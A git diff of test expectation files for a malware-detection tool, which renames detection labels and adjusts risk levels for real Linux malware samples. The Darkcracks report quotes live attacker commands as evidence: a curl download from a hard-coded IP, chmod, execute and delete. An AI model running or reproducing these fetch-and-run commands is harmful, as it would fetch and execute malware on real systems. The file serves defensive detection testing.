impact/remote_access/reverse_shell: medium
impact/remote_access/ssh: high
impact/rootkit: critical
-impact/rootkit/refs: high
impact/ui/x11_auth: medium
malware/family/fontonlake: critical
net/download: medium
@@ -80,9 +82,9 @@ net/tcp/ssh: medium
net/tun_tap: medium
net/url/embedded: low
persist/daemon: medium
+persist/kernel_module/insert: high
persist/kernel_module/kprobe: medium
persist/kernel_module/module: medium
-persist/kernel_module/module_load: medium
persist/kernel_module/symbol_lookup: high
persist/pid_file: medium
process/chroot: low
@@ -93,4 +95,3 @@ process/name_set: medium
process/userid_set: low
process/username_set: medium
sus/ancient_gcc: medium
-sus/malicious: medium
diff --git a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
index 65d91e761..d33af9524 100644
--- a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
+++ b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
@@ -14,12 +14,13 @@ data/encoding/base64: low
data/hash/blake2b: low
data/hash/sha1: low
data/random/insecure: low
-discover/network/interface_get: low
-discover/system/cpu_info: low
+discover/network/interface: low
+discover/process/runtime_deps: medium
+discover/system/cpu: low
discover/system/platform: low
discover/system/sysinfo: medium
discover/user/HOME: low
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
exec/conditional/LANG: low
exec/dylib/address_check: low
exec/dylib/iterate: low
@@ -86,4 +87,3 @@ privesc/sudo: medium
process/create: low
process/multithreaded: low
process/name_set: medium
-process/thread_local_storage: low
diff --git a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple
index 831775516..0184dfa7d 100644
--- a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple
+++ b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple
@@ -6,7 +6,7 @@ credential/keylogger: medium
credential/password: low
discover/network/interface_list: medium
discover/system/platform: low
-evasion/hijack_execution/process_hide: critical
+evasion/rootkit/userspace: critical
exec/dylib/symbol_address: medium
exfil/stealer/pam: high
fs/link_read: low
diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
index 5905cae77..435fce245 100644
--- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
+++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
@@ -1,9 +1,7 @@
## linux/2022.bpfdoor/2023.ConnectBack/tiny [😈 CRITICAL]
-| RISK | KEY | DESCRIPTION | EVIDENCE |
-|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------|
-| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
-| HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | |
-| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | |
-| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
+| RISK | KEY | DESCRIPTION | EVIDENCE |
+|----------|----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------|
+| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
+| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
diff --git a/tests/linux/2022.bpfdoor/bpfdoor_2.simple b/tests/linux/2022.bpfdoor/bpfdoor_2.simple
index 9ca216b9d..0c0f91b34 100644
--- a/tests/linux/2022.bpfdoor/bpfdoor_2.simple
+++ b/tests/linux/2022.bpfdoor/bpfdoor_2.simple
@@ -1,7 +1,6 @@
# linux/2022.bpfdoor/bpfdoor_2: critical
3P/elastic/bpfdoor: critical
credential/sniffer/pcap: high
-evasion/hidden_paths/x11: low
evasion/logging/hide_shell_history: high
exec/program: medium
exec/program/background: low
diff --git a/tests/linux/2022.ez-pwnkit/payload.simple b/tests/linux/2022.ez-pwnkit/payload.simple
index 944a8619e..c1c01e83a 100644
--- a/tests/linux/2022.ez-pwnkit/payload.simple
+++ b/tests/linux/2022.ez-pwnkit/payload.simple
@@ -1,7 +1,7 @@
# linux/2022.ez-pwnkit/payload: critical
c2/addr/ip: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
exec/plugin: low
exec/program: medium
diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md
index 65dc88375..082d8ea1a 100644
--- a/tests/linux/2023.ConnectBack/tiny.md
+++ b/tests/linux/2023.ConnectBack/tiny.md
@@ -1,9 +1,7 @@
## linux/2023.ConnectBack/tiny [😈 CRITICAL]
-| RISK | KEY | DESCRIPTION | EVIDENCE |
-|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------|
-| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
-| HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | |
-| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | |
-| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
+| RISK | KEY | DESCRIPTION | EVIDENCE |
+|----------|----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------|
+| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
+| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
diff --git a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff
index 50848ad7d..cf673d234 100644
--- a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff
+++ b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff
@@ -11,11 +11,12 @@
+anti-static/base64/exec
+anti-static/base64/http_agent
+data/base64/external
++data/embedded/base64_elf
+data/embedded/base64_terms
+data/embedded/base64_url
+data/embedded/pgp_key
+data/encoding/base64
-+evasion/hidden_paths/var_tmp
++evasion/file/location/var_tmp
+exec/install_additional/add_apt_key
+exec/shell/exec
+exec/shell/ignore_output
@@ -28,7 +29,9 @@
+fs/path/usr_bin
+fs/path/var
+fs/permission/modify
++impact/remote_access/botnet
+net/download
+net/url/embedded
-+persist/cron/echo_tab
++persist/cron/etc_d
+persist/cron/tab
++sus/geopolitics
diff --git a/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple b/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple
index 83d98a90b..10f71a219 100644
--- a/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple
+++ b/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple
@@ -15,6 +15,7 @@ fs/path/usr_sbin_telnetd: high
fs/proc/net_route: high
impact/ddos: critical
impact/ddos/raw_flooder: medium
+lateral/scan/tool: medium
net/dns/servers: low
net/http/fake_user_agent: medium
net/ip/parse: medium
diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple
index ed250bc6d..37a0c28f7 100644
--- a/tests/linux/2023.Kinsing/install.sh.simple
+++ b/tests/linux/2023.Kinsing/install.sh.simple
@@ -19,10 +19,10 @@ evasion/bypass_security/linux/iptables: medium
evasion/bypass_security/linux/se: medium
evasion/bypass_security/linux/se_disable: high
evasion/bypass_security/linux/ufw: medium
-evasion/covert_location/dev_shm: critical
-evasion/hidden_paths/dev_shm: critical
-evasion/hidden_paths/hidden: high
-evasion/hidden_paths/var_tmp: medium
+evasion/file/location/dev_shm: critical
+evasion/file/location/var_tmp: medium
+evasion/file/prefix/dev: critical
+evasion/file/prefix/tmp: high
evasion/hijack_execution/etc_ld.so.preload: high
evasion/logging/syslog: medium
evasion/mimicry/fake_process: critical
@@ -56,16 +56,16 @@ impact/cryptojacking/cryptonight: high
impact/cryptojacking/generic: high
impact/cryptojacking/monero_pool: medium
impact/cryptojacking/xmrig: high
+impact/degrade/firewall: high
impact/degrade/infection: critical
impact/degrade/linux_paths: high
-impact/degrade/selinux_firewall: high
-impact/degrade/ufw: high
impact/remote_access/agent: medium
impact/remote_access/iptables: medium
impact/remote_access/kill_rm: medium
net/download: medium
net/download/fetch: high
net/url/embedded: low
+persist/cron/etc_d: high
persist/cron/tab: medium
persist/daemon: medium
persist/linux_multi: high
diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md
index 495e7d436..068854e57 100644
--- a/tests/linux/2024.Darkcracks/darkcracks.sh.md
+++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md
@@ -3,7 +3,7 @@
| RISK | KEY | DESCRIPTION | EVIDENCE |
|----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| CRITICAL | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) |
-| CRITICAL | [evasion/covert_location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) |
+| CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) |
| CRITICAL | [evasion/self_deletion/run_sleep_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) |
| CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) |
| HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v)
[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl) |
diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
index c9be21eeb..a301fce64 100644
--- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
+++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
@@ -16,12 +16,12 @@ data/compression/gzip: low
data/encoding/base64: low
data/hash/md5: low
discover/network/netstat: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
evasion/bypass_security/linux/se: medium
evasion/bypass_security/linux/se_disable: high
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
exec/plugin: low
exec/program: medium
exec/shell/exec: medium
@@ -59,7 +59,7 @@ net/dns: low
net/dns/servers: low
net/dns/txt: low
net/download: medium
-net/download/fetch: medium
+net/download/fetch: high
net/http/2: low
net/http/accept_encoding: low
net/http/auth: low
@@ -88,8 +88,6 @@ net/url/parse: low
net/url/request: medium
os/fd/sendfile: low
os/kernel/netlink: low
-persist/cron/echo_tab: high
-persist/cron/hidden_tab: critical
-persist/cron/tab: medium
+persist/cron/tab: critical
persist/daemon: medium
process/groups_set: low
diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
index 0489009db..3152b473a 100644
--- a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
+++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
@@ -14,12 +14,12 @@ data/encoding/base64: low
data/encoding/json: low
data/encoding/json_decode: low
data/hash/md5: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
exec/cmd: medium
exec/plugin: low
exec/program: medium
diff --git a/tests/linux/2024.chisel/crondx.simple b/tests/linux/2024.chisel/crondx.simple
index 3c58b6b40..3afefaff8 100644
--- a/tests/linux/2024.chisel/crondx.simple
+++ b/tests/linux/2024.chisel/crondx.simple
@@ -13,8 +13,8 @@ data/compression/gzip: low
data/encoding/base64: low
data/encoding/json: low
data/hash/md5: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
exec/plugin: low
exec/program: medium
diff --git a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
index 456a2d854..4210546ff 100644
--- a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
+++ b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
@@ -21,11 +21,11 @@ data/encoding/json_decode: low
data/hash/md5: low
discover/ip/public: high
discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/user/HOME: low
evasion/bypass_security/linux/pam: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
exec/plugin: low
exec/system_controls/systemd: medium
diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple
index 2765835ac..599e81b10 100644
--- a/tests/linux/2024.gas/gas.simple
+++ b/tests/linux/2024.gas/gas.simple
@@ -1,7 +1,8 @@
# linux/2024.gas/gas: high
anti-behavior/LD_DEBUG: medium
anti-behavior/LD_PROFILE: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
+discover/system/dev_full: low
discover/system/platform: low
discover/system/sysinfo: medium
evasion/hijack_execution/LD_LIBRARY_PATH: low
@@ -25,9 +26,7 @@ fs/proc/sys_kernel_osrelease: medium
fs/tempdir: low
fs/tempdir/TMPDIR: low
hw/cpu: medium
-impact/exploit/GCONV_PATH: low
impact/remote_access/dl_iterate: high
-impact/remote_access/reverse_shell: medium
net/socket/send: low
net/url/embedded: low
process/create: low
diff --git a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
index 7010cb07e..e5453d82d 100644
--- a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
+++ b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
@@ -1,5 +1,5 @@
# linux/2024.hadooken/crondr_as_bash.sh: critical
-evasion/covert_location/chdir_unusual: high
+evasion/file/location/chdir_unusual: high
evasion/mimicry/fake_process: high
evasion/self_deletion/copy_run_delete: critical
exec/shell/exec: medium
diff --git a/tests/linux/2024.hadooken/ssh_worm.sh.simple b/tests/linux/2024.hadooken/ssh_worm.sh.simple
index d918a8b0e..84202d84b 100644
--- a/tests/linux/2024.hadooken/ssh_worm.sh.simple
+++ b/tests/linux/2024.hadooken/ssh_worm.sh.simple
@@ -9,7 +9,7 @@ credential/ssh: high
data/base64/external: medium
data/embedded/base64_url: medium
data/encoding/base64: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
exec/shell/pipe_sh: medium
exec/shell/tmp_semicolon: high
exfil/stealer/linux_server: high
diff --git a/tests/linux/2024.k4spreader/degrader.sh.simple b/tests/linux/2024.k4spreader/degrader.sh.simple
index 5d6c337f8..5da701263 100644
--- a/tests/linux/2024.k4spreader/degrader.sh.simple
+++ b/tests/linux/2024.k4spreader/degrader.sh.simple
@@ -4,5 +4,4 @@ evasion/bypass_security/linux/ufw: medium
evasion/hijack_execution/etc_ld.so.preload: high
fs/attributes/chattr: medium
fs/path/etc: low
-impact/degrade/iptables: high
-impact/degrade/ufw: high
+impact/degrade/firewall: high
diff --git a/tests/linux/2024.k4spreader/knlib.simple b/tests/linux/2024.k4spreader/knlib.simple
index 435f19650..fd69bf578 100644
--- a/tests/linux/2024.k4spreader/knlib.simple
+++ b/tests/linux/2024.k4spreader/knlib.simple
@@ -1,5 +1,5 @@
# linux/2024.k4spreader/knlib: critical
-evasion/covert_location/chdir_unusual: high
+evasion/file/location/chdir_unusual: high
evasion/self_deletion/copy_run_delete: critical
exec/shell/exec: medium
exec/shell/ignore_output: medium
diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json
index 462a28c6a..baa2a4b88 100644
--- a/tests/linux/2024.kubo_injector/injector.json
+++ b/tests/linux/2024.kubo_injector/injector.json
@@ -15,26 +15,30 @@
{
"Description": "may inject code into other processes",
"MatchStrings": [
- "/proc/%d/maps",
- "process",
- "ptrace"
+ "/proc",
+ "maps",
+ "successfully injected",
+ "to inject",
+ "to-inject"
],
"RiskScore": 3,
"RiskLevel": "HIGH",
- "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#ptrace_injector",
+ "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#library_injector",
"ID": "evasion/process_injection/process_inject",
- "RuleName": "ptrace_injector"
+ "RuleName": "library_injector"
},
{
- "Description": "trace or modify system calls",
+ "Description": "may inject code into other processes",
"MatchStrings": [
+ "/proc/%d/maps",
+ "process",
"ptrace"
],
- "RiskScore": 2,
- "RiskLevel": "MEDIUM",
- "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace",
+ "RiskScore": 3,
+ "RiskLevel": "HIGH",
+ "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace_injector",
"ID": "evasion/process_injection/ptrace",
- "RuleName": "ptrace"
+ "RuleName": "ptrace_injector"
},
{
"Description": "get the address of a symbol",
@@ -85,17 +89,6 @@
"ID": "fs/proc/arbitrary_pid",
"RuleName": "proc_arbitrary"
},
- {
- "Description": "accesses underlying executable of other processes",
- "MatchStrings": [
- "/proc/%s/exe"
- ],
- "RiskScore": 3,
- "RiskLevel": "HIGH",
- "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-exe.yara#proc_exe",
- "ID": "fs/proc/pid_exe",
- "RuleName": "proc_exe"
- },
{
"Description": "access process memory maps",
"MatchStrings": [
diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
index cee09e8ae..f7983ea6d 100644
--- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
+++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
@@ -6,7 +6,6 @@
anti-behavior/vm_check: medium
c2/addr/http_dynamic: medium
c2/addr/ip: medium
-c2/addr/url: high
c2/discovery/ip_dns_resolver: medium
c2/tool_transfer/download: medium
collect/archives/unarchive: medium
@@ -32,19 +31,20 @@ data/encoding/json_decode: low
data/hash/blake2b: low
data/hash/md5: low
data/hash/sha256: low
+discover/network/connectivity: low
discover/network/netstat: medium
discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: medium
-evasion/covert_location/chdir_unusual: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/dev_shm: critical
-evasion/hidden_paths/hidden: high
+evasion/file/location/chdir_unusual: medium
+evasion/file/location/dev_shm: medium
+evasion/file/prefix/dev: critical
+evasion/file/prefix/tmp: high
evasion/hijack_execution/LD_LIBRARY_PATH: low
evasion/logging/current_logins: medium
evasion/logging/hide_shell_history: high
@@ -125,7 +125,6 @@ net/ip/host_port: medium
net/ip/icmp: medium
net/ip/multicast_send: low
net/ip/parse: medium
-net/ip/spoof: medium
net/ip/tcp_state_tracker: medium
net/proxy/shadowsocks: high
net/proxy/socks5: medium
diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple
index d05ad257d..709a44a35 100644
--- a/tests/linux/2024.kworker_pretenders/gafgyt.simple
+++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple
@@ -1,13 +1,14 @@
# linux/2024.kworker_pretenders/gafgyt: critical
3P/elastic/mirai: critical
3P/threat_hunting/base64: medium
-anti-static/packer/elf: high
+anti-static/elf/content: high
credential/ssh/d: medium
data/base64/external: medium
data/encoding/base64: low
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/var_run: medium
-evasion/hidden_paths/var_tmp: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/multiple: high
+evasion/file/location/var_run: medium
+evasion/file/location/var_tmp: medium
evasion/mimicry/fake_process: critical
exec/shell/echo: medium
exec/shell/exec: medium
@@ -26,6 +27,7 @@ fs/proc/self_exe: medium
net/dns/servers: low
net/http/request: low
net/socket/send: low
+persist/cron/etc_d: high
persist/cron/tab: medium
persist/daemon: medium
process/executable_path: low
diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple
index 79a6bc7ad..af8c2f55f 100644
--- a/tests/linux/2024.medusa/rkload.simple
+++ b/tests/linux/2024.medusa/rkload.simple
@@ -4,20 +4,25 @@ anti-behavior/LD_DEBUG: medium
anti-behavior/LD_PROFILE: medium
anti-static/xor/commands: high
credential/ssh/d: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
+discover/system/dev_full: low
discover/system/sysinfo: medium
-evasion/covert_location/dev_shm: high
-evasion/hidden_paths/dev_shm: critical
-evasion/hidden_paths/hidden: high
-evasion/hide_artifacts/system_directories: medium
+evasion/file/location/dev_shm: high
+evasion/file/location/lib: high
+evasion/file/location/system_directory: medium
+evasion/file/prefix: high
+evasion/file/prefix/dev: critical
+evasion/file/prefix/lib: high
evasion/hijack_execution/LD_LIBRARY_PATH: low
evasion/hijack_execution/etc_ld.so.preload: medium
+evasion/rootkit/userspace: critical
exec/conditional/LANG: low
exec/dylib/address_check: low
exec/dylib/symbol_address: medium
exec/program: medium
exec/program/background: low
exec/shell/exec: medium
+exfil/stealer/ssh: high
fs/attributes/set: medium
fs/directory/create: low
fs/file/copy: medium
@@ -35,9 +40,6 @@ fs/proc/stat: medium
fs/tempdir: low
fs/tempdir/TMPDIR: low
hw/cpu: medium
-impact/exploit/GCONV_PATH: low
-impact/remote_access/reverse_shell: medium
-impact/rootkit/readdir_interceptor: high
malware/family/medusa: critical
net/socket/local_addr: low
net/socket/send: low
diff --git a/tests/linux/2024.miner_dropper/drop.sh.simple b/tests/linux/2024.miner_dropper/drop.sh.simple
index ed3045bb0..8f15244cb 100644
--- a/tests/linux/2024.miner_dropper/drop.sh.simple
+++ b/tests/linux/2024.miner_dropper/drop.sh.simple
@@ -1,7 +1,7 @@
# linux/2024.miner_dropper/drop.sh: critical
c2/addr/ip: high
c2/tool_transfer/shell: critical
-evasion/covert_location/chdir_unusual: critical
+evasion/file/location/chdir_unusual: critical
exec/shell/busybox_exec: high
exec/shell/exec: medium
exec/shell/relative_semicolon: high
diff --git a/tests/linux/2024.sbcl.market/sbcl.sdiff b/tests/linux/2024.sbcl.market/sbcl.sdiff
index f2962b838..a24fab7f3 100644
--- a/tests/linux/2024.sbcl.market/sbcl.sdiff
+++ b/tests/linux/2024.sbcl.market/sbcl.sdiff
@@ -2,7 +2,7 @@
-data/compression/zstd
-discover/user/HOME
-discover/user/USER
--evasion/hidden_paths/var_tmp
+-evasion/file/location/var_tmp
-exec/dylib/address_check
-exec/dylib/symbol_address
-exec/program
@@ -19,12 +19,12 @@
-fs/symlink_resolve
-net/url/embedded
++++ added: sbcl.dirty
-+anti-static/packer/high_entropy
++anti-static/elf/entropy
+data/compression/zstd
+data/embedded/zstd
+discover/user/HOME
+discover/user/USER
-+evasion/hidden_paths/var_tmp
++evasion/file/location/var_tmp
+exec/dylib/address_check
+exec/dylib/symbol_address
+exec/program
diff --git a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
index 43567cf92..4d90726f1 100644
--- a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
+++ b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
@@ -1,6 +1,7 @@
# linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: critical
-anti-static/packer/elf: high
-anti-static/packer/high_entropy: medium
+anti-static/elf/content: high
+anti-static/elf/entropy: high
+anti-static/elf/header: high
anti-static/packer/upx: high
c2/addr/ip: high
credential/sniffer/bpf: medium
diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md
index d9e616d5f..08b10ab08 100644
--- a/tests/linux/UPX/06ed158.md
+++ b/tests/linux/UPX/06ed158.md
@@ -1,10 +1,11 @@
## linux/UPX/06ed158 [😈 CRITICAL]
-| RISK | KEY | DESCRIPTION | EVIDENCE |
-|--------|-------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------|
-| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | |
-| HIGH | [anti-static/packer/high_entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/high_entropy.yara#high_entropy_7_9) | high entropy binary (>7.9) | |
-| HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) |
-| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
